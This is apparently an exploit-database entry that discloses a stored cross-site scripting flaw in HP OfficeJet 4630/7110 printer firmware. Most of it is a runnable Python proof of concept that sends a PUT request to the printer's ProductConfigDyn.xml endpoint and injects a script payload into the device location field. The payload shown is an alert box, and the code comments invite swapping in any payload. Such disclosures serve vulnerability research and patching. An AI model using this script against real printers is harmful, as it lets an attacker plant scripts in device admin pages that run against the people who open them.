HP OfficeJet 4630/7110 MYM1FN2025AR 2117A Cross Site Scripting

HP OfficeJet 4630/7110 MYM1FN2025AR 2117A suffers from a persistent cross site scripting vulnerability.


MD5 | 4eee4ebfc8fc6ad4ad5c28453320f0f8

# Exploit Title: HP OfficeJet 4630/7110 MYM1FN2025AR 2117A – Stored Cross-Site Scripting (XSS)
# Date: 01/08/2021
# Exploit Author: Tyler Butler
# Vendor Homepage: https://www8.hp.com/
# Vendor Bulletin: https://support.hp.com/ie-en/document/ish_4433829-4433857-16/hpsbpi03742
# Researcher Bulletin: https://tbutler.org/2021/04/29/hp-officejet-4630
# Version: HP OfficeJet 7110 Wide Format ePrinter
# Tested on: HP Officejet 4630 e-All-in-One Printer series model number B4L03A

# PoC:
import requests
import json
from requests.exceptions import HTTPError

target = 'http://192.168.223.1' # The IP of the vulnerable taget
payload = '''<script>alert('XSS');</script>''' # The XSS injection payload you want to use
path='/DevMgmt/ProductConfigDyn.xml' # Path location of the PUT command
pre = '''
<?xml version="1.0" encoding="UTF-8"?>
<!-- THIS DATA SUBJECT TO DISCLAIMER(S) INCLUDED WITH THE PRODUCT OF ORIGIN. -->
<prdcfgdyn2:ProductConfigDyn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:prdcfgdyn2="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16" xmlns:prdcfgdyn="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16 ../schemas/ledm2/ProductConfigDyn.xsd http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05 ../schemas/ProductConfigDyn.xsd http://www.hp.com/schemas/imaging/con/dictionaries/1.0/ ../schemas/dd/DataDictionaryMasterLEDM.xsd">
<prdcfgdyn2:ProductSettings>
<prdcfgdyn:DeviceInformation>
<dd:DeviceLocation>
''' # The start of the request body
post = '''
</dd:DeviceLocation>
</prdcfgdyn:DeviceInformation>
</prdcfgdyn2:ProductSettings>
</prdcfgdyn2:ProductConfigDyn>
''' # The end of the request body
body = pre + payload + post


headers = {
'Host':'192.168.223.1',
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0',
'Accept':'*/*',
'Accept-Language':'en-US,en;q=0.5',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'text/xml',
'Content-Length':str(len(body.encode('utf-8'))),
'Origin':'https://192.168.223.1',
'Connection':'close',
'Referer':target,
}

print('{!} Starting HP Officejet 4630 XSS Injector .... \n Author: Tyler Butler\n @tbutler0x90')
try:
print('{!} Injecting payload :',payload)
response = requests.put(target+path, headers = headers, data = body)
response.raise_for_status()
except HTTPError as http_err:
print('{X}',f'HTTP error occurred: {http_err}')
except Exception as err:
print('{X}',f'Other error occurred: {err}')
else:
print('{!} Success!')


Related Posts